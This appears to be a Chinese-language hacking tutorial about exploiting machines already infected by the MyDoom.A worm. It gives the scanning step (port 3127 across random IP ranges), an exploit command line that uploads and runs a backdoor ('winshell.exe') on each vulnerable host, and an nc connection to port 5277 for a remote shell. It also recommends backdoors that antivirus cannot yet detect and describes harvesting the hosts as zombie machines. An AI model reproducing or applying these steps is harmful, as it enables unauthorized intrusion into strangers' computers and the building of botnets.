而且,過了幾天我就在一個(gè)外國(guó)的網(wǎng)站找到了溢出MyDoomd.A的exploit和編譯好的溢出程序的。感覺現(xiàn)在利用病毒或者蠕蟲來找肉雞十分流行。例如前一段時(shí)間的愛之門,只要掃描20168端口就可以拿到一個(gè)具有admin權(quán)限的shell。話說我拿到溢出程序后,又利用google找到了MyDoom的掃描器,在測(cè)試一下,發(fā)現(xiàn)這個(gè)蠕蟲的泛濫情況的確十分嚴(yán)重,我隨意地掃了一個(gè)ip段,就有N多地機(jī)器中了這個(gè)蠕蟲,從win98到winxp,都有!根據(jù)我和QQ上的一位好友測(cè)試,據(jù)說他還找到了中了win2003的,實(shí)在是對(duì)我們國(guó)內(nèi)的安全情況感到無語啊,
好了,廢話就不多說了,打開CMD,cd到存放溢出MyDoom.A的文件夾那里,運(yùn)行溢出程序,界面如圖1
看就明白怎么用了,呵呵,非常簡(jiǎn)單。不過在溢出之前,倒也要掃描器掃掃,其實(shí)我們只要用superscan掃3127端口也可以得到很多的掃描結(jié)果,只是我比較喜歡用專用的掃描器而已,打開掃描器,界面如圖
大家所看到的是我已經(jīng)掃描完畢的結(jié)果了,顯示VULNERABLE的,就是可以溢出的。我們現(xiàn)在開始來試試。
直接提交nodoom.exe XXX.159.95.112 3127 winshell.exe ,其中winshell就是我們要傳輸?shù)暮箝T,你也可以換成其他的,不過最好是換成殺毒軟件暫時(shí)不可以查殺的后門,不然……
呵呵,后果可想而知。Ok,提示文件傳輸完成,而且并運(yùn)行后,直接連接后門了,我的是默認(rèn)端口,所以直接用nc連接5277端口。呵呵,看來是一臺(tái)xp啊,圖
得到shell后,我們可以執(zhí)行任何的命令了,不過這個(gè)就不在本文的討論范圍了。對(duì)本文有更好的建議或者疑問的可以到http://www.cbhu.net與我討論!